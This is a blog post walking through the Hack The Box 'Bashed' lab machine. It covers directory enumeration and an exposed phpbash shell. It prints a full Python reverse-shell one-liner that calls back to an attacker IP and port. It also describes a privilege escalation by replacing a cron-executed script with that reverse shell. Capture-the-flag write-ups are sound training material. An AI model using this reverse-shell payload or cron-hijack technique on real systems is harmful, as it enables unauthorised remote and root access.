<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="D K V V Varma">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2024/09/14/bashed/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="BASHEDIntroduction: On Tuesday, October 10th, the night air felt unusually brisk. While this detail might seem unrelated, it sets the stage for our journey. Let’s delve into the core of the matter wit">
<meta property="og:type" content="article">
<meta property="og:title" content="&#39;Bashed&#39;">
<meta property="og:url" content="http://example.com/2024/09/14/bashed/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="BASHEDIntroduction: On Tuesday, October 10th, the night air felt unusually brisk. While this detail might seem unrelated, it sets the stage for our journey. Let’s delve into the core of the matter wit">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/l0905h7ucbtjgpgm4yebn/1.png?rlkey=zmcwm1rs01gfhumjztspl2usb&st=tiqwlcoo&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/dx7qzn5ci9jhdeeg1vuec/2.png?rlkey=ur3g2i4nubo02dinncv9fv5e4&st=3hl62rlt&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/f0oq2pn1pmyxclmg4d1gp/3.png?rlkey=n39u9vq3c09dt3cc5no45rh1b&st=an68a7kd&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/eajl8dfx7opalls6y4rqv/4.png?rlkey=0ttwa77j1pigkykrij572y7cy&st=nbl9c70e&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/qskrfzit8iepopj4c99pm/5.png?rlkey=r330xpx1s1affeko0b6i30rgd&st=umsmh8vh&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/8gqhw25mwlk40n32y4284/6.png?rlkey=13hwulgnzssddpb9st495my6i&st=ffc41cju&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/ua09evi8uzmkvrzmckc6u/7.png?rlkey=pqk8tfk26fmnn9499mg9i78tn&st=1ml2ql2j&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/3t2h5c482iqts75cjha3u/8.png?rlkey=k1yaqa3616zheq45q8fl37732&st=lk90z4nu&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/lrk5yps0mks5k9ea356q8/9.png?rlkey=zj15fbf5x9p7emzj5d2ht1d59&st=ofi9hu7e&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/njr9wa6kn8413h0q5o0ji/10.png?rlkey=cp5a148r0g97dtkor5quxbaf5&st=xtmt7wkh&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/njr9wa6kn8413h0q5o0ji/10.png?rlkey=cp5a148r0g97dtkor5quxbaf5&st=xtmt7wkh&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/xrc77w7kv5erteps2qwzw/12.png?rlkey=1fazs200e3xfggdx8npc6f2s9&st=dvo767b1&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/dpvk7wmsq3quzczykswnx/13.png?rlkey=9hzccxdo5nuilj5apkozdh7q4&st=yx1q80lw&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/651bsigt5yb6uzat7lgsr/14.png?rlkey=bve71pn4uxc5d0wzsjakyfa3v&st=dnnk7gi8&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/hobufss03ccei77p8vcw3/15.png?rlkey=y11leurska971xxde86xlm9fi&st=f6vzqck6&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/n2m5eukq46kvzriqypt1i/16.png?rlkey=xm16qfrpjygbovdg7bab86dpg&st=lyvly99t&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/akobt7hpvw9e1f11nc4jw/17.png?rlkey=nc329h5eiq8372agnhufe2k0w&st=bxvdxtes&dl=0">
<meta property="og:image" content="https://dl.dropbox.com/scl/fi/jmw4uzgvcrlbqgttwii34/18.png?rlkey=6klroj0h1aeb6759knd2spm2l&st=k9gmvprc&dl=0">
<meta property="article:published_time" content="2024-09-14T17:07:45.509Z">
<meta property="article:modified_time" content="2024-09-21T14:59:15.563Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="HackTheBox">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://dl.dropbox.com/scl/fi/l0905h7ucbtjgpgm4yebn/1.png?rlkey=zmcwm1rs01gfhumjztspl2usb&st=tiqwlcoo&dl=0">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="https://dl.dropbox.com/scl/fi/jf7g9za3v2rh4rafcet1a/avatar-image.jpg?rlkey=4x65jmugdlnty4utj4xvztfsd&amp;st=hn686juk&amp;dl=0" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="https://dl.dropbox.com/scl/fi/jf7g9za3v2rh4rafcet1a/avatar-image.jpg?rlkey=4x65jmugdlnty4utj4xvztfsd&amp;st=hn686juk&amp;dl=0">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="https://dl.dropbox.com/scl/fi/jf7g9za3v2rh4rafcet1a/avatar-image.jpg?rlkey=4x65jmugdlnty4utj4xvztfsd&st=hn686juk&dl=0">
    <!--- Page Info-->
    
    <title>
        
            &#39;Bashed&#39; -
        
        Hello There!
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
        <style>
    :root {
        --preloader-background-color: #fff;
        --preloader-text-color: #000;
    }

    @media (prefers-color-scheme: dark) {
        :root {
            --preloader-background-color: #202124;
            --preloader-text-color: #fff;
        }
    }

    @media (prefers-color-scheme: light) {
        :root {
            --preloader-background-color: #fff;
            --preloader-text-color: #000;
        }
    }

    @media (max-width: 600px) {
        .ml13 {
            font-size: 2.6rem !important; /* Adjust this value as needed */
        }
    }

    .preloader {
        display: flex;
        flex-direction: column;
        gap: 1rem; /* Tailwind 'gap-4' is 1rem */
        align-items: center;
        justify-content: center;
        position: fixed;
        padding: 12px;
        top: 0;
        right: 0;
        bottom: 0;
        left: 0;
        width: 100vw;
        height: 100vh; /* 'h-screen' is 100% of the viewport height */
        background-color: var(--preloader-background-color);
        z-index: 1100; /* 'z-[1100]' sets the z-index */
        transition: opacity 0.2s ease-in-out;
    }

    .ml13 {
        font-size: 3.2rem;
        /* text-transform: uppercase; */
        color: var(--preloader-text-color);
        letter-spacing: -1px;
        font-weight: 500;
        font-family: 'Chillax-Variable', sans-serif;
        text-align: center;
    }

    .ml13 .word {
        display: inline-flex;
        flex-wrap: wrap;
        white-space: nowrap;
    }

    .ml13 .letter {
        display: inline-block;
        line-height: 1em;
    }
</style>

<div class="preloader">
    
<script src="/js/libs/anime.min.js"></script>

    <h1 class="ml13">
        Hello There!
    </h1>
    <script>
        var textWrapper = document.querySelector('.ml13');
        // Split text into words
        var words = textWrapper.textContent.trim().split(' ');

        // Clear the existing content
        textWrapper.innerHTML = '';

        // Wrap each word and its letters in spans
        words.forEach(function(word) {
            var wordSpan = document.createElement('span');
            wordSpan.classList.add('word');
            wordSpan.innerHTML = word.replace(/\S/g, "<span class='letter'>$&</span>");
            textWrapper.appendChild(wordSpan);
            textWrapper.appendChild(document.createTextNode(' ')); // Add space between words
        });


        anime.timeline({loop: true})
            .add({
                targets: '.ml13 .letter',
                translateY: [100,0],
                translateZ: 0,
                opacity: [0,1],
                easing: "easeOutExpo",
                duration: 1400,
                delay: (el, i) => 300 + 30 * i
            }).add({
            targets: '.ml13 .letter',
            translateY: [0,-100],
            opacity: [1,0],
            easing: "easeInExpo",
            duration: 1200,
            delay: (el, i) => 100 + 30 * i
        });

        let themeStatus = JSON.parse(localStorage.getItem('REDEFINE-THEME-STATUS'))?.isDark;

        // If the theme status is not found in local storage, check the preferred color scheme
        if (themeStatus === undefined || themeStatus === null) {
            if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
                themeStatus = 'dark';
            } else {
                themeStatus = 'light';
            }
        }

        // Now you can use the themeStatus variable in your code
        if (themeStatus) {
            document.documentElement.style.setProperty('--preloader-background-color', '#202124');
            document.documentElement.style.setProperty('--preloader-text-color', '#fff');
        } else {
            document.documentElement.style.setProperty('--preloader-background-color', '#fff');
            document.documentElement.style.setProperty('--preloader-text-color', '#000');
        }

        window.addEventListener('load', function () {
            hidePreloaderAfterTimeout(1000); // Hide after 1000 milliseconds once the window has loaded
        });

        // Backup failsafe: Hide preloader after a maximum of 5000 milliseconds, regardless of the window load event
        hidePreloaderAfterTimeout(5000);

        function hidePreloaderAfterTimeout(delay) {
            setTimeout(function () {
                var preloader = document.querySelector('.preloader');
                preloader.style.opacity = '0';
                setTimeout(function () {
                    preloader.style.display = 'none';
                }, 200);
            }, delay);
        }
    </script>
</div>
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/assets/build/styles.css">

    

    
<link rel="stylesheet" href="/fonts/fonts.css">

    
<link rel="stylesheet" href="/fonts/Satoshi/satoshi.css">

    <!--- Font Part-->
    
    
    
    


    <script id="hexo-configurations">
    window.config = {"hostname":"example.com","root":"/","language":"en"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"title_alignment":"left","headings_top_spacing":{"h1":"5rem","h2":"4rem","h3":"2.8rem","h4":"2.5rem","h5":"2.2rem","h6":"2rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"dark"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":false,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":true,"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"https://dl.dropbox.com/scl/fi/b4ibcd491p94r5i3o3nxo/tronbg.jpg?rlkey=uvm6n8l87w2ms3trt383o6k7y&st=jxf40cnb&dl=0"},"title":"Theme Redefine","subtitle":{"text":[],"hitokoto":{"enable":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"style":"default","links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.6.2","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives","icon":"fa-regular fa-archive"}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":null},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 7.2.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
<!--        <span class="swup-progress-icon">-->
<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
<!--        </span>-->
    
</div>


<main class="page-container" id="swup">

    

    <div class="main-content-container">


        <div class="main-content-header">
            <header class="navbar-container px-6 md:px-12">

    <div class="navbar-content ">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                Hello There!
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    HOME
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/archives"
                                        >
                                    <i class="fa-regular fa-archive fa-fw"></i>
                                    ARCHIVES
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-screen w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                HOME
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/archives"
                        >
                            <span>
                                ARCHIVES
                            </span>
                            
                                <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            

            
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">1</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">0</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">1</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="post-page-container flex relative justify-between box-border w-full h-full">
    <div class="article-content-container">

        <div class="article-title relative w-full">
            
                <div class="w-full flex items-center pt-6 justify-start">
                    <h1 class="article-title-regular text-second-text-color text-4xl md:text-6xl font-bold px-2 sm:px-6 md:px-8 py-3">&#39;Bashed&#39;</h1>
                </div>
            
            </div>

        
            <div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
                <div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
                    <img src="https://dl.dropbox.com/scl/fi/jf7g9za3v2rh4rafcet1a/avatar-image.jpg?rlkey=4x65jmugdlnty4utj4xvztfsd&st=hn686juk&dl=0">
                </div>
                <div class="info flex flex-col justify-between">
                    <div class="author flex items-center">
                        <span class="name text-default-text-color text-lg font-semibold">D K V V Varma</span>
                        
                            <span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Lv1</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2024-09-14 22:37:45</span>
        <span class="mobile">2024-09-14 22:37:45</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2024-09-21 20:29:15</span>
            <span class="mobile">2024-09-21 20:29:15</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/HackTheBox/">HackTheBox</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
</div>

                    </div>
                </div>
            </div>
        

        


        <div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
            <h1 id="BASHED"><a href="#BASHED" class="headerlink" title="BASHED"></a>BASHED</h1><p><strong>Introduction:</strong></p>
<p>On Tuesday, October 10th, the night air felt unusually brisk. While this detail might seem unrelated, it sets the stage for our journey. Let’s delve into the core of the matter without further ado.</p>
<p>So, lets Enumerate the Ip</p>
<p><strong>Enumeration:</strong></p>
<p>The first rule of hacking, akin to starting a vehicle with a key, is to enumerate the target. Here, we begin by enumerating the IP address:</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/l0905h7ucbtjgpgm4yebn/1.png?rlkey=zmcwm1rs01gfhumjztspl2usb&st=tiqwlcoo&dl=0"
                      alt="image1"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/dx7qzn5ci9jhdeeg1vuec/2.png?rlkey=ur3g2i4nubo02dinncv9fv5e4&st=3hl62rlt&dl=0"
                      alt="image2"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/f0oq2pn1pmyxclmg4d1gp/3.png?rlkey=n39u9vq3c09dt3cc5no45rh1b&st=an68a7kd&dl=0"
                      alt="image3"
                ></p>
<p>All I found in that IP address is a normal website lets just brute force it with our super directory brute forcing tool Gobuster<br>(you can even use  dirbuster depends on the choice of you)</p>
<p>when it started to list out the directories , it came across few intresting </p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/eajl8dfx7opalls6y4rqv/4.png?rlkey=0ttwa77j1pigkykrij572y7cy&st=nbl9c70e&dl=0"
                      alt="image4"
                ></p>
<p>well &#x2F;dev seems intresting<br>navigating to &#x2F;dev and then phpbash<br>we got answer for question 2</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/qskrfzit8iepopj4c99pm/5.png?rlkey=r330xpx1s1affeko0b6i30rgd&st=umsmh8vh&dl=0"
                      alt="image5"
                ></p>
<p><strong>Exploitation:</strong></p>
<p>Upon accessing the website, I encountered the user interface with the username</p>
<p><code>**www-data**</code>  which serves as the answer for question 3:</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/8gqhw25mwlk40n32y4284/6.png?rlkey=13hwulgnzssddpb9st495my6i&st=ffc41cju&dl=0"
                      alt="image6"
                ></p>
<p>I need to generate a reverse shell and setup a netcat listener </p>
<p>I found the following reverse shell code and used my tun0 ip<br>(if you don’t have tun0 ip use eth0 ip)</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">&#x27;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.10.14.3&quot;,8686)); //Change IP and Port </span></span><br><span class="line"><span class="string">os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);&#x27;</span></span><br></pre></td></tr></table></figure></div>

<p>I’m gonna use 8686 so start a netcat listener with same port</p>
<p>After successful execution of reverse shell I got the following in my listener</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/ua09evi8uzmkvrzmckc6u/7.png?rlkey=pqk8tfk26fmnn9499mg9i78tn&st=1ml2ql2j&dl=0"
                      alt="img"
                ></p>
<p><strong>Note</strong> in order to make the reverse shell listener more stable, run the following code. SO it wont throw garbage characters when pressed arrow keys.<br><strong>python -c ‘import pty; pty.spawn(”&#x2F;bin&#x2F;bash”);’</strong></p>
<p>As the question pointed out the flag is in user <strong>arrexel</strong> folder which is in home directory</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/3t2h5c482iqts75cjha3u/8.png?rlkey=k1yaqa3616zheq45q8fl37732&st=lk90z4nu&dl=0"
                      alt="img"
                ></p>
<p>Well First part is done on to privilege escalation</p>
<p>run the command sudo -l  to see what command can www-get can run without requiring password or permissions from root user</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/lrk5yps0mks5k9ea356q8/9.png?rlkey=zj15fbf5x9p7emzj5d2ht1d59&st=ofi9hu7e&dl=0"
                      alt="img"
                ></p>
<p>As the picture depicts it is <code>scriptmanager</code></p>
<p>To switch to user scriptmanager</p>
 <div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">**sudo -u scriptmanager /bin/bash**</span><br></pre></td></tr></table></figure></div>
<p>The explanation for the flags are<br><strong><code>sudo</code></strong>: This is the command used to allow a permitted user to execute a command as the superuser                </p>
<p><strong><code>-u scriptmanager</code></strong>: This option tells <strong><code>sudo</code></strong> to run the subsequent command (<strong><code>/bin/bash</code></strong> in this case) as the user specified after <strong><code>-u</code></strong>, which is <strong><code>scriptmanager</code></strong> in this case.</p>
<p><strong><code>/bin/bash</code></strong>: This is the command that will be executed with superuser privileges. In this example, it’s invoking the Bash shell.</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/njr9wa6kn8413h0q5o0ji/10.png?rlkey=cp5a148r0g97dtkor5quxbaf5&st=xtmt7wkh&dl=0"
                      alt="img"
                ></p>
<p>There is an interesting directory which can be accessed by only the user scriptmanager</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/njr9wa6kn8413h0q5o0ji/10.png?rlkey=cp5a148r0g97dtkor5quxbaf5&st=xtmt7wkh&dl=0"
                      alt="img"
                ></p>
<p>The answer for question 5 is cd &#x2F;scripts</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/xrc77w7kv5erteps2qwzw/12.png?rlkey=1fazs200e3xfggdx8npc6f2s9&st=dvo767b1&dl=0"
                      alt="Untitled"
                ></p>
<p>Going on</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/dpvk7wmsq3quzczykswnx/13.png?rlkey=9hzccxdo5nuilj5apkozdh7q4&st=yx1q80lw&dl=0"
                      alt="Untitled"
                ></p>
<p>I checked the folder and its files</p>
<p>There is a simple script in <strong>‘test.py’</strong> which writes output on file <strong>‘test.txt’</strong>. One more interesting thing we got is that creation time of file test.txt is keep updating to the latest time. This mean there is a cron job or something like background process is running which runs test.py script automatically. If we replace the test.py file with our test.py file containing reverse shell code and check might we can get reverse shell of root user or not.</p>
<p>In order to do that create a HTTP Server using python from the directory where we have saved our reverse shell code.</p>
<p>since the <strong>test.py</strong> is being executed by cron job i can use the same reverse shell code at the start of this machine</p>
<p>before that i need to setup a python web server to download that reverse shell into listner shell</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/651bsigt5yb6uzat7lgsr/14.png?rlkey=bve71pn4uxc5d0wzsjakyfa3v&st=dnnk7gi8&dl=0"
                      alt="Untitled"
                ></p>
<p>the command is<br>python3 -m http.server 8000</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/hobufss03ccei77p8vcw3/15.png?rlkey=y11leurska971xxde86xlm9fi&st=f6vzqck6&dl=0"
                      alt="Untitled"
                ></p>
<p>After setting up server download the file to reverse shell listener </p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/n2m5eukq46kvzriqypt1i/16.png?rlkey=xm16qfrpjygbovdg7bab86dpg&st=lyvly99t&dl=0"
                      alt="Untitled"
                ></p>
<p>After successful download start another netcat listener to capture root shell</p>
<p>Since our reverse shell program saved as test.py.1 , we need to change it as original file name ,</p>
<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">**<span class="built_in">rm</span> test.py and <span class="built_in">mv</span> test.py.1**</span><br></pre></td></tr></table></figure></div>

<p>So , for reverse shell listener I have used 4422 port number and wait for few minutes , and let the cronjob do its job .</p>
<p>After a couple of minutes , you can see your listener founds a shell</p>
<p>Tip: if the the shell didn’t pick anything in 2 mins try running the program once to check for syntaxes </p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/akobt7hpvw9e1f11nc4jw/17.png?rlkey=nc329h5eiq8372agnhufe2k0w&st=bxvdxtes&dl=0"
                      alt="Untitled"
                ></p>
<p>There you go enjoy the Root flag</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://dl.dropbox.com/scl/fi/jmw4uzgvcrlbqgttwii34/18.png?rlkey=6klroj0h1aeb6759knd2spm2l&st=k9gmvprc&dl=0"
                      alt="Untitled"
                ></p>
<p><strong>Conclusion:</strong></p>
<p>In conclusion, the Bashed machine on Hack The Box presented a series of challenges that required meticulous enumeration, exploitation, and privilege escalation. By following these steps, I successfully navigated through the obstacles and obtained the root flag.</p>

        </div>

        
            <div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
                <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> &#39;Bashed&#39;</li>
        <li><strong>Author:</strong> D K V V Varma</li>
        <li><strong>Created at
                :</strong> 2024-09-14 22:37:45</li>
        
            <li>
                <strong>Updated at
                    :</strong> 2024-09-21 20:29:15
            </li>
        
        <li>
            <strong>Link:</strong> https://redefine.ohevan.com/2024/09/14/bashed/
        </li>
        <li>
            <strong>
                License:
            </strong>
            

            
                This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a>.
            
        </li>
    </ul>
</div>

            </div>
        

        
            <ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/HackTheBox/">#HackTheBox</a>&nbsp;
                    </li>
                
            </ul>
        

        

        


        
            <div class="comment-container px-2 sm:px-6 md:px-8 pb-8">
                <div class="comments-container mt-10 w-full ">
    <div id="comment-anchor" class="w-full h-2.5"></div>
    <div class="comment-area-title w-full my-1.5 md:my-2.5 text-xl md:text-3xl font-bold">
        Comments
    </div>
    

        
            
    <div id="waline"></div>
    <script type="module" data-swup-reload-script>
      import { init } from '/js/libs/waline.mjs';

      function loadWaline() {
        init({
          el: '#waline',
          serverURL: 'https://example.example.com',
          lang: 'zh-CN',
          dark: 'body[class~="dark-mode"]',
          requiredMeta: ['nick', 'mail'],
          emoji: [],
          recaptchaV3Key: "wasd",
          
        });
      }

      if (typeof swup !== 'undefined') {
        loadWaline();
      } else {
        window.addEventListener('DOMContentLoaded', loadWaline);
      }
    </script>



        
    
</div>

            </div>
        
    </div>

    
        <div class="toc-content-container">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">&#39;Bashed&#39;</div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#BASHED"><span class="nav-text">BASHED</span></a></li></ol>

    </div>
</div>
        </div>
    
</div>



                

            </div>

            

        </div>

        <div class="main-content-footer">
            <footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2024&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">D K V V Varma</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        1 posts in total
                    </span>
                    
